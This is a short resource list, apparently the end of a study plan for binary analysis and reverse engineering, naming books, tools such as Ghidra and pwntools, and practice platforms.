
Resources

Essential Books

“Practical Binary Analysis” by Dennis Andriesse - Best overall introduction
“Hacking: The Art of Exploitation” by Jon Erickson - Classic exploitation book
“Practical Malware Analysis” by Sikorski & Honig - Malware-focused
“Reversing: Secrets of Reverse Engineering” by Eldad Eilam - In-depth RE
“The Shellcoder’s Handbook” - Advanced exploitation

Tools

Ghidra: https://ghidra-sre.org/ - Free decompiler
radare2: https://rada.re/ - Open source RE framework
pwntools: https://docs.pwntools.com/ - Exploit development
angr: https://angr.io/ - Binary analysis framework
AFL++: https://aflplus.plus/ - Fuzzer

Practice Platforms

pwnable.kr: https://pwnable.kr/ - CTF challenges
crackmes.one: https://crackmes.one/ - Reverse engineering
ROP Emporium: https://ropemporium.com/ - ROP practice
Nightmare: https://guyinatuxedo.github.io/ - Walkthroughs

Reference Materials

Total Estimated Time: 8-12 months of dedicated study

After completion: You’ll be able to analyze any binary, find vulnerabilities, write exploits, analyze malware, and build professional reverse engineering tools. These skills are in high demand for security research, vulnerability assessment, malware analysis, and CTF competitions.